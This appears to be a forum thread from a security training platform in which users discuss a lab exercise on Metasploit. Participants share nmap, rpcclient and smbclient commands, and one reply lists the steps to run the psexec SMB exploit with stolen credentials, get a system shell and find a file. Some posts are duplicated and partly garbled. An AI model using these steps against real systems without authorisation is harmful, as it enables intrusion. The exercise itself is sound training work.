Automating Payloads & Delivery with Metasploit

famasoon · December 31, 2022, 8:51am

In this content I have tried the following commands and looked for vulnerabilities.

$ sudo nmap -sS -sV --script vuln <IP>
$ rpcclient -U "htb-student" <IP>
$ smbclient -L //<IP> -U htb-student

However, nothing is found…

What command language interpreter is used to establish a system shell session with the target?

Exploit the target using what you’ve learned in this section, then submit the name of the file located in htb-student’s Documents folder. (Format: filename.extension)

Any tips on how to solve these problems?

famasoon · January 3, 2023, 5:12am

(I got help on Discord, Thanks).
I got my answers by reading the content of this academy thoroughly!

Winston · March 25, 2023, 8:40am

Hi, I have completed the first question, but I am still stuck on the second one. I used Metasploit to obtain the system shell, but I cannot locate the “Documents” folder. I have tried commands like “dir” and “dir /a,” which displayed several directories and files, but I still cannot find the “Documents” folder. Could you let me know if I missed something?

Winston · March 25, 2023, 10:39am

I have solved the problem by getting tips from ChatGPT. Thanks to its timely responses.

JinXi · July 27, 2023, 2:35am

For the second problem, you need to go to the documentation directory under the htb-student user’s directory in the system-level shell.

Dave78905 · July 30, 2023, 4:02pm

I used Metasploit to obtain the system shell, but I cannot locate the “Documents” folder. I have tried commands like “d r ” and “d r /a,” which displayed several directories and files, but I still cannot find the “Documents” folder. Could you let me know if I missed something. Regards :typing test

Rhodium · August 30, 2023, 12:22pm

Hello. I’m stuck at the same place.What commant did you use to find the documents folder?

7h34Ud1T0R · September 20, 2023, 5:49pm

If you have the shell, you can use the same commands you would use navigating around windows using a command prompt.

George4567 · January 1, 2024, 2:16am

Hi, I have completed the first question, but I am still stuck on the second one. I used Metasploit to obtain the system shell, but I cannot locate the “Documents” folder. I have tried commands like “dir” and “dir /a,” which displayed several directories and files, but I still cannot find the “Documents” folder. Could you let me know if I missed something I used Metasploit to obtain the system shell, but I cannot locate the “Documents” folder. I have tried commands like “d r ” and “d r /a,” which displayed several directories and files, but I still cannot find the “Documents” folder. Could you let me know if I missed something.
Regards:

msksmail · January 11, 2024, 11:50am

Hello! Everything is simple here, you need to do everything that was in this section
msfconsole
search smb
use exploit/windows/smb/psexec
set all parameters LHOST, RHOST , SMBPass, SMBUser, SHARE
exploit
and then search file in C:\User\htb-student\Documents

alxcastro95 · January 14, 2024, 2:38pm

tnks i didnt set the LHOST jajajajaj